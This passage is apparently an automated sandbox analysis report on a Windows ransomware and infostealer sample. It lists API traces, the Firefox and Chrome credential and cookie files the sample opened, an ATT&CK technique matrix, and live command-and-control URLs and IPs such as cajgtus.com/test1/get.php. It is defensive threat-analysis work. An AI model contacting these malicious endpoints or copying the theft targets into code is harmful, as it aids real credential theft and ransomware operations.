,___getlocaleinfo,___getlocaleinfo,5_2_02263F87
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_02370AB6
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_0235C8B7
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_0236394D
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_023649EA
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_02363F87
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A4C54 FillConsoleOutputCharacterW,lstrcatW,InterlockedExchangeAdd,LoadIconW,LocalShrink,FindAtomW,DeleteAtom,GetConsoleSelectionInfo,_memset,GetDefaultCommConfigW,RaiseException,ReadConsoleOutputA,WaitForDebugEvent,EnumDateFormatsA,TryEnterCriticalSection,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetDateFormatA,GetLastError,GetSystemTimes,FoldStringW,GetConsoleAliasesLengthA,GetNamedPipeHandleStateA,GetComputerNameA,GetFileAttributesW,GetBinaryTypeA,FormatMessageA,_malloc,_malloc,_mbrtowc,_calloc,LocalAlloc,LoadLibraryA,GlobalFlags,GetFileType,InterlockedDecrement,0_2_004A4C54
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\0absryc3.default\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lockJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.oldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          12
          System Time Discovery
          1
          Taint Shared Content
          11
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts1
          Shared Modules
          1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          3
          Obfuscated Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          Command and Scripting Interpreter
          1
          Services File Permissions Weakness
          311
          Process Injection
          22
          Software Packing
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Screen Capture
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS24
          System Information Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness
          1
          Masquerading
          LSA Secrets1
          Query Registry
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials141
          Security Software Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync21
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Services File Permissions Weakness
          Proc Filesystem2
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1494419 Sample: file.exe Startdate: 18/08/2024 Architecture: WINDOWS Score: 100 52 cajgtus.com 2->52 54 api.2ip.ua 2->54 58 Multi AV Scanner detection for domain / URL 2->58 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 9 other signatures 2->64 9 file.exe 2->9         started        12 file.exe 2->12         started        14 file.exe 2->14         started        16 file.exe 2->16         started        signatures3 process4 signatures5 72 Detected unpacking (changes PE section rights) 9->72 74 Detected unpacking (overwrites its own PE header) 9->74 76 Writes a notice file (html or txt) to demand a ransom 9->76 86 2 other signatures 9->86 18 file.exe 1 17 9->18         started        78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 82 Injects a PE file into a foreign processes 12->82 22 file.exe 12->22         started        84 Sample uses process hollowing technique 14->84 24 file.exe 14->24         started        26 file.exe 16->26         started        process6 dnsIp7 56 api.2ip.ua 188.114.96.3, 443, 49711, 49713 CLOUDFLARENETUS European Union 18->56 46 C:\Users\user\AppData\Local\...\file.exe, PE32 18->46 dropped 48 C:\Users\user\...\file.exe:Zone.Identifier, ASCII 18->48 dropped 28 file.exe 18->28         started        31 icacls.exe 18->31         started        file8 process9 signatures10 88 Injects a PE file into a foreign processes 28->88 33 file.exe 1 21 28->33         started        process11 dnsIp12 50 cajgtus.com 109.175.29.39, 49719, 49724, 80 BIHNETBIHNETAutonomusSystemBA Bosnia and Herzegowina 33->50 38 C:\Users\user\AppData\...\CacheStorage.jfm, COM 33->38 dropped 40 C:\_readme.txt, ASCII 33->40 dropped 42 C:\...\ThirdPartyNotice.html.watz (copy), data 33->42 dropped 44 110 other malicious files 33->44 dropped 66 Tries to harvest and steal browser information (history, passwords, etc) 33->66 68 Infects executable files (exe, dll, sys, html) 33->68 70 Modifies existing user documents (likely ransomware behavior) 33->70 file13 signatures14

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe34%ReversingLabsWin32.Trojan.Generic
          file.exe36%VirustotalBrowse
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe34%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe36%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          cajgtus.com21%VirustotalBrowse
          api.2ip.ua6%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.nytimes.com/0%URL Reputationsafe
          http://www.openssl.org/support/faq.html0%URL Reputationsafe
          https://substrate.office.com0%URL Reputationsafe
          http://www.wikipedia.com/0%URL Reputationsafe
          http://www.reddit.com/0%URL Reputationsafe
          https://api.2ip.ua/c0%Avira URL Cloudsafe
          https://api.2ip.ua/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonX0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.php100%Avira URL Cloudmalware
          https://api.2ip.ua/e0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonsoft0%Avira URL Cloudsafe
          http://www.amazon.com/0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.phpG100%Avira URL Cloudmalware
          http://cajgtus.com/test1/get.php19%VirustotalBrowse
          https://api.2ip.ua/6%VirustotalBrowse
          http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true100%Avira URL Cloudmalware
          http://cajgtus.com/test1/get.phpG22%VirustotalBrowse
          https://api.2ip.ua/geo.jsonsoft0%VirustotalBrowse
          https://api.2ip.ua/geo.jsonX3%VirustotalBrowse
          http://www.twitter.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/c3%VirustotalBrowse
          https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
          http://www.amazon.com/0%VirustotalBrowse
          http://www.twitter.com/0%VirustotalBrowse
          https://api.2ip.ua/Root0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonKuL50%Avira URL Cloudsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json6%VirustotalBrowse
          http://www.youtube.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsons3%VirustotalBrowse
          https://api.2ip.ua/geo.jsonp3%VirustotalBrowse
          https://api.2ip.ua/geo.jsonp0%Avira URL Cloudsafe
          https://api.2ip.ua/e3%VirustotalBrowse
          http://www.youtube.com/0%VirustotalBrowse
          https://api.2ip.ua/Root2%VirustotalBrowse
          https://api.2ip.ua/geo.jsons0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsoneE0%Avira URL Cloudsafe
          http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4100%Avira URL Cloudmalware
          https://api.2ip.ua/geo.jsonhi0%Avira URL Cloudsafe
          http://www.live.com/0%Avira URL Cloudsafe
          https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d0%Avira URL Cloudsafe
          http://www.google.com/0%Avira URL Cloudsafe
          https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d0%VirustotalBrowse
          http://www.live.com/0%VirustotalBrowse
          http://www.google.com/0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          cajgtus.com
          109.175.29.39
          truetrueunknown
          api.2ip.ua
          188.114.96.3
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          http://cajgtus.com/test1/get.phptrue
          • 19%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          https://api.2ip.ua/geo.jsonfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.nytimes.com/file.exe, 00000007.00000003.2337050221.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.2ip.ua/geo.jsonXfile.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/file.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.000000000089B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.000000000089C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2437911480.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2473936462.000000000089E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2477831755.000000000089E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 6%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/cfile.exe, 0000000C.00000002.2437911480.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2431855915.00000000007C6000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/efile.exe, 0000000C.00000002.2437911480.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2431855915.00000000007C6000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/geo.jsonsoftfile.exe, 0000000F.00000003.2513307620.00000000007FD000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.amazon.com/file.exe, 00000007.00000003.2336499216.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://cajgtus.com/test1/get.phpGfile.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmptrue
          • 22%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=truefile.exe, 00000007.00000002.2763764574.0000000000848000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://www.twitter.com/file.exe, 00000007.00000003.2337270091.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.openssl.org/support/faq.htmlfile.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.2ip.ua/Rootfile.exe, 0000000C.00000002.2437911480.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/geo.jsonKuL5file.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://substrate.office.com58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.7.drfalse
          • URL Reputation: safe
          unknown
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errorfile.exe, 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.youtube.com/file.exe, 00000007.00000003.2337550109.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/geo.jsonpfile.exe, 00000002.00000003.2187001173.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/geo.jsonsfile.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.wikipedia.com/file.exe, 00000007.00000003.2337335720.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.live.com/file.exe, 00000007.00000003.2336875189.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.reddit.com/file.exe, 00000007.00000003.2337127273.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.2ip.ua/geo.jsonhifile.exe, 0000000C.00000002.2437911480.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://api.2ip.ua/geo.jsoneEfile.exe, 0000000F.00000003.2513307620.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
